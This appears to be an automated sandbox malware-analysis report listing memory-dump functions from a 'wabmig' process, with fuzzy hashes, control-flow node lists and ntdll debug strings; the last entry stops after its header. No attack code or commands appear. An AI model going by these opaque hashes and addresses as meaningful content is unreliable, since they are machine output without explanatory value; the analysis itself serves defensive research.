              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3d54dae18319b130c07c005a7c152645795eafd46804e5f7a56afcb23b33a629
              • Instruction ID: e5af3167645ebe94920e64177f68d17ed1c5cd9b8ca4d2f05b084adaa9e07e24
              • Opcode Fuzzy Hash: 3d54dae18319b130c07c005a7c152645795eafd46804e5f7a56afcb23b33a629
              • Instruction Fuzzy Hash: 1B90022160550402D140725D545C706401957D4601F55D021A0464514DC65A8B5567A2
              Function 219B2CF0 Relevance: .0, Instructions: 4COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: edacfb05dbf93f37633095d343ce53717d68fbeea2fdcebb7a0e1be126137e4f
              • Instruction ID: 9ab76f99708c8f1bbcf073de02784d55bd0076110a308f261552f284e8c70c9c
              • Opcode Fuzzy Hash: edacfb05dbf93f37633095d343ce53717d68fbeea2fdcebb7a0e1be126137e4f
              • Instruction Fuzzy Hash: 6F90023120150403D100725D554C707400957D4601F55D421A0864518DD65789516222
              Function 219B2C60 Relevance: .0, Instructions: 4COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 752f0b7d021cc40b344f0252c07aba2616c7295d30efec5e57f5d55e0fb7d5ba
              • Instruction ID: dd92fc75edb8b06be587eed7305fa803883d3a3231d907b65496d8de9e92c1a8
              • Opcode Fuzzy Hash: 752f0b7d021cc40b344f0252c07aba2616c7295d30efec5e57f5d55e0fb7d5ba
              • Instruction Fuzzy Hash: 1990023120150842D100725D4448B46400957E4701F55C026A0564614DC616C9517622
              Function 219B2F90 Relevance: .0, Instructions: 4COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 98bc26e6480db2e040d3862bc92bf1baaf7c2298cd228c6bdf3581e364f61021
              • Instruction ID: db24ddcd58fb059092cee2c51ddf06e923df45c86828faf94f0baf16bca37ef8
              • Opcode Fuzzy Hash: 98bc26e6480db2e040d3862bc92bf1baaf7c2298cd228c6bdf3581e364f61021
              • Instruction Fuzzy Hash: 2E90023120190402D100725D485870B400957D4702F55C021A15A4515DC62689516672
              Function 219B2FB0 Relevance: .0, Instructions: 4COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c24282265455fce1cf91b262917ea336b07f8ad58cf58907199e2aeb15216e81
              • Instruction ID: 8ca2a9871694717543834b656fbb3cca5e16d6ae3f5f9848a3f9349170ec3f28
              • Opcode Fuzzy Hash: c24282265455fce1cf91b262917ea336b07f8ad58cf58907199e2aeb15216e81
              • Instruction Fuzzy Hash: 7D900221601500424140726D888890680097BE5611755C131A0DD8510DC55A89655766
              Function 219B2FA0 Relevance: .0, Instructions: 4COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bff2cad74e12a2349aaeb0aeb07c45ff19b300c18ddc25cdedadd1a36d1733ef
              • Instruction ID: 0db8078087a167de455064a8f9d74fe46d8e6a401fd5edb9fdb96991a74df052
              • Opcode Fuzzy Hash: bff2cad74e12a2349aaeb0aeb07c45ff19b300c18ddc25cdedadd1a36d1733ef
              • Instruction Fuzzy Hash: CA90023120190402D100725D484C747400957D4702F55C021A55A4515EC666C9916632
              Function 219B2FE0 Relevance: .0, Instructions: 4COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 23a102cea71c8fa9ec3b6942df5a7aab9d263b139edfff389abc0744f255d346
              • Instruction ID: 59ac1dde6a3dcc8a72c2b72f80d6ea03bbecfe73b3384cb8a8e80337fe9e1c2b
              • Opcode Fuzzy Hash: 23a102cea71c8fa9ec3b6942df5a7aab9d263b139edfff389abc0744f255d346
              • Instruction Fuzzy Hash: 44900221211D0042D200766D4C58B07400957D4703F55C125A0594514CC91689615622
              Function 219B2F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1ab68ec196e07d2d36c389b67a6b02b40f4c537ac32d0b35e17f43473065df78
              • Instruction ID: 0bdb52bbf95f0422348725934f1a7b6276a8663e6edaa02a19ccf3cb3fa5acde
              • Opcode Fuzzy Hash: 1ab68ec196e07d2d36c389b67a6b02b40f4c537ac32d0b35e17f43473065df78
              • Instruction Fuzzy Hash: B290026134150442D100725D4458B06400997E5701F55C025E14A4514DC61ACD526227
              Function 219B2F60 Relevance: .0, Instructions: 4COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 89df3c6b37d22c95a3b3b28b089ce9cb98e6153e589689c086cb46b5c6e12ba9
              • Instruction ID: 8a7b6ffebe740207c582f349bfda9f3beadca00b40792a6430def8cfdc30029d
              • Opcode Fuzzy Hash: 89df3c6b37d22c95a3b3b28b089ce9cb98e6153e589689c086cb46b5c6e12ba9
              • Instruction Fuzzy Hash: 2190026121150042D104725D4448706404957E5601F55C022A2594514CC52A8D615226
              Function 219B2E80 Relevance: .0, Instructions: 4COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5f3edc5e62740d3e56ccc75d29727fe20978d5c4345e4af16e5d3aa1a07e77cf
              • Instruction ID: c314f81cf89479d3d53725b0de176a40482f149999682611316510c4d15ee7c1
              • Opcode Fuzzy Hash: 5f3edc5e62740d3e56ccc75d29727fe20978d5c4345e4af16e5d3aa1a07e77cf
              • Instruction Fuzzy Hash: 3390022160150502D101725D4448616400E57D4641F95C032A1464515ECA268A92A232
              Function 219B2EA0 Relevance: .0, Instructions: 4COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5be00276abede17a98b2d54c3f5903e6d5158cd23e03747bc43d7a900939ec19
              • Instruction ID: 1e67e74df8333c731c430be1cac2624bf68183bfb3b7a29340e89335b0bc1b99
              • Opcode Fuzzy Hash: 5be00276abede17a98b2d54c3f5903e6d5158cd23e03747bc43d7a900939ec19
              • Instruction Fuzzy Hash: 9890027120150402D140725D4448746400957D4701F55C021A54A4514EC65A8ED56766
              Function 219B2EE0 Relevance: .0, Instructions: 4COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c30fe247a383da09c8aa2bb27fe03d12cfb3fd2e9565dd8eafbd55f5a9e7238a
              • Instruction ID: 22dc29ee279346fda85e121b2d11f057201595f3209765cad344e41e234a09c9
              • Opcode Fuzzy Hash: c30fe247a383da09c8aa2bb27fe03d12cfb3fd2e9565dd8eafbd55f5a9e7238a
              • Instruction Fuzzy Hash: CE90026120190403D140765D4848607400957D4702F55C021A24A4515ECA2A8D516236
              Function 219B2E30 Relevance: .0, Instructions: 4COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 14d976499d8b108a39ca29d53c06638b2b835b87101dfacd87e81b6209b29277
              • Instruction ID: fce5678ef5456d88e47153918f2c4dd58d5a925c059da0b681ca673086f53ed1
              • Opcode Fuzzy Hash: 14d976499d8b108a39ca29d53c06638b2b835b87101dfacd87e81b6209b29277
              • Instruction Fuzzy Hash: D290022130150402D102725D4458606400D97D5745F95C022E1864515DC6268A53A233
              Function 219B2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
              • Instruction ID: 0bcd5a290ecec86cc6b2055ecd37f1a2aa66c749fd107bc9694648891732aa07
              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
              • Instruction Fuzzy Hash:
              Function 219B2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 686 219b2890-219b28b3 687 219ea4bc-219ea4c0 686->687 688 219b28b9-219b28cc 686->688 687->688 689 219ea4c6-219ea4ca 687->689 690 219b28ce-219b28d7 688->690 691 219b28dd-219b28df 688->691 689->688 692 219ea4d0-219ea4d4 689->692 690->691 693 219ea57e-219ea585 690->693 694 219b28e1-219b28e5 691->694 692->688 695 219ea4da-219ea4de 692->695 693->691 696 219b28eb-219b28fa 694->696 697 219b2988-219b298e 694->697 695->688 698 219ea4e4-219ea4eb 695->698 699 219ea58a-219ea58d 696->699 700 219b2900-219b2905 696->700 701 219b2908-219b290c 697->701 702 219ea4ed-219ea4f4 698->702 703 219ea564-219ea56c 698->703 699->701 700->701 701->694 704 219b290e-219b291b 701->704 706 219ea50b 702->706 707 219ea4f6-219ea4fe 702->707 703->688 705 219ea572-219ea576 703->705 708 219b2921 704->708 709 219ea592-219ea599 704->709 705->688 710 219ea57c call 219c0050 705->710 712 219ea510-219ea536 call 219c0050 706->712 707->688 711 219ea504-219ea509 707->711 713 219b2924-219b2926 708->713 715 219ea5a1-219ea5c9 call 219c0050 709->715 728 219ea55d-219ea55f 710->728 711->712 712->728 717 219b2928-219b292a 713->717 718 219b2993-219b2995 713->718 719 219b292c-219b292e 717->719 720 219b2946-219b2966 call 219c0050 717->720 718->717 724 219b2997-219b29b1 call 219c0050 718->724 719->720 725 219b2930-219b2944 call 219c0050 719->725 735 219b2969-219b2974 720->735 724->735 725->720 731 219b2981-219b2985 728->731 735->713 737 219b2976-219b2979 735->737 737->715 738 219b297f 737->738 738->731
              APIs
              Strings
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID: ___swprintf_l
              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
              • API String ID: 48624451-2108815105
              • Opcode ID: e649ed56fac3eed35d1522a52fd237b04b27107f8bfd19bd488ab947631eaf30
              • Instruction ID: b0020a4b30e4bba9609b9ed3984e7c95749f39fadc8bd9cab4d7c0e142b0e9d2
              • Opcode Fuzzy Hash: e649ed56fac3eed35d1522a52fd237b04b27107f8bfd19bd488ab947631eaf30
              • Instruction Fuzzy Hash: 2C51C3B6A00116AFDB11DF98C99097EFBBCFB49241B10816AE4ACD7641D734EF0087E1
              Function 219A7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 943 219a7630-219a7651 944 219a768b-219a7699 call 219b4c30 943->944 945 219a7653-219a766f call 2197e660 943->945 950 219e4638 945->950 951 219a7675-219a7682 945->951 955 219e463f-219e4645 950->955 952 219a769a-219a76a9 call 219a7818 951->952 953 219a7684 951->953 959 219a76ab-219a76c1 call 219a77cd 952->959 960 219a7701-219a770a 952->960 953->944 957 219e464b-219e46b8 call 219ff290 call 219b9020 BaseQueryModuleData 955->957 958 219a76c7-219a76d0 call 219a7728 955->958 957->958 980 219e46be-219e46c6 957->980 958->960 970 219a76d2 958->970 959->955 959->958 963 219a76d8-219a76e1 960->963 967 219a770c-219a770e 963->967 968 219a76e3-219a76f2 call 219a771b 963->968 974 219a76f4-219a76f6 967->974 968->974 970->963 976 219a76f8-219a76fa 974->976 977 219a7710-219a7719 974->977 976->953 979 219a76fc 976->979 977->976 981 219e47be-219e47d0 call 219b2c50 979->981 980->958 982 219e46cc-219e46d3 980->982 981->953 982->958 985 219e46d9-219e46e4 982->985 986 219e46ea-219e4723 call 219ff290 call 219baaa0 985->986 987 219e47b9 call 219b4d48 985->987 993 219e473b-219e476b call 219ff290 986->993 994 219e4725-219e4736 call 219ff290 986->994 987->981 993->958 999 219e4771-219e477f call 219ba770 993->999 994->960 1002 219e4786-219e47a3 call 219ff290 call 219ecf9e 999->1002 1003 219e4781-219e4783 999->1003 1002->958 1008 219e47a9-219e47b2 1002->1008 1003->1002 1008->999 1009 219e47b4 1008->1009 1009->958
              Strings
              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 219E46FC
              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 219E4655
              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 219E4725
              • Execute=1, xrefs: 219E4713
              • CLIENT(ntdll): Processing section info %ws..., xrefs: 219E4787
              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 219E4742
              • ExecuteOptions, xrefs: 219E46A0
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
              • API String ID: 0-484625025
              • Opcode ID: 07daa7a9b06d4667f4c9bdbe2939244f744abd3d31371a88a9e68ca975204a28
              • Instruction ID: 5ff29d12bd4a704ff208cdba089780b11fde39e6ce63c66fc13870a06256d2fc
              • Opcode Fuzzy Hash: 07daa7a9b06d4667f4c9bdbe2939244f744abd3d31371a88a9e68ca975204a28
              • Instruction Fuzzy Hash: 53510631A0021A7EEF15DFA4DCA6FE977BCAB59305F0000E9D60CA7191E7339A498F51
              Function 219BB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID: __aulldvrm
              • String ID: +$-$0$0
              • API String ID: 1302938615-699404926
              • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
              • Instruction ID: 20c911a1794b58d9dea5b2a86e64fda505fc457e1f2825e74e573baa692faeb7
              • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
              • Instruction Fuzzy Hash: 4181F570E012498EEF25CF68C890BEEBBB9AF46361F18419DD85BA76C1C7308B40CB51
              Function 219ABED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
              Download Yara Rule
              Strings
              • RTL: Re-Waiting, xrefs: 219E7BAC
              • RTL: Resource at %p, xrefs: 219E7B8E
              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 219E7B7F
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
              • API String ID: 0-871070163
              • Opcode ID: b807f5d3cf282f987a5f6f1e28c7a37b49771493aac05a70edb515fc5b31e21e
              • Instruction ID: 4c3bc005822caaa9bcc4607915ab2d2877c0b5424d10a0af137d7f4e08b93536
              • Opcode Fuzzy Hash: b807f5d3cf282f987a5f6f1e28c7a37b49771493aac05a70edb515fc5b31e21e
              • Instruction Fuzzy Hash: 4A4103313007029FD725DF25C840F5AB7E9EF89711F140A6EEA5E97280DB32E9098B92
              Function 219AB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
              Download Yara Rule
              APIs
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 219E728C
              Strings
              • RTL: Re-Waiting, xrefs: 219E72C1
              • RTL: Resource at %p, xrefs: 219E72A3
              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 219E7294
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
              • API String ID: 885266447-605551621
              • Opcode ID: d7cd16290e5262ccc3f3ed36c2a3822f0122a91610081ac16f421e3880f31c69
              • Instruction ID: f7f333d25490e2f64f61c6fd852d8dfe44ca7d489643629b79cf75031e2ae0a6
              • Opcode Fuzzy Hash: d7cd16290e5262ccc3f3ed36c2a3822f0122a91610081ac16f421e3880f31c69
              • Instruction Fuzzy Hash: DA41D031700206AFD726CE25CC41F56BBA9FB95711F10061AFA5EAB340DB22E846C7D2
              Function 219B7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID: __aulldvrm
              • String ID: +$-
              • API String ID: 1302938615-2137968064
              • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
              • Instruction ID: 82bbc2e088d8a6b948b52ce74d8db86d4b979c98e4a162b88958b4af668902af
              • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
              • Instruction Fuzzy Hash: 2391C671E0020A9FDB18CF69C880AAEBBB9EF45761F10475EE95DE72D0D7319B408715
              Function 21979126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID: $$@
              • API String ID: 0-1194432280
              • Opcode ID: c804ea0c90ad0f8f8b7c43f5fd3a32a5b38acce3b9bc0a66e838552e6702c463
              • Instruction ID: 7d676bb30e78aa7c3e1cb5fc6025517c7af0d75a58885988a151dc4fff196af6
              • Opcode Fuzzy Hash: c804ea0c90ad0f8f8b7c43f5fd3a32a5b38acce3b9bc0a66e838552e6702c463
              • Instruction Fuzzy Hash: 328118B6D002699FDB21CF54CC44BDAB6B8BF49750F0041EAAA1DB7250E7309E858FA1

              Executed Functions

              Function 03A5B4E5 Relevance: 34.1, Strings: 27, Instructions: 382COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
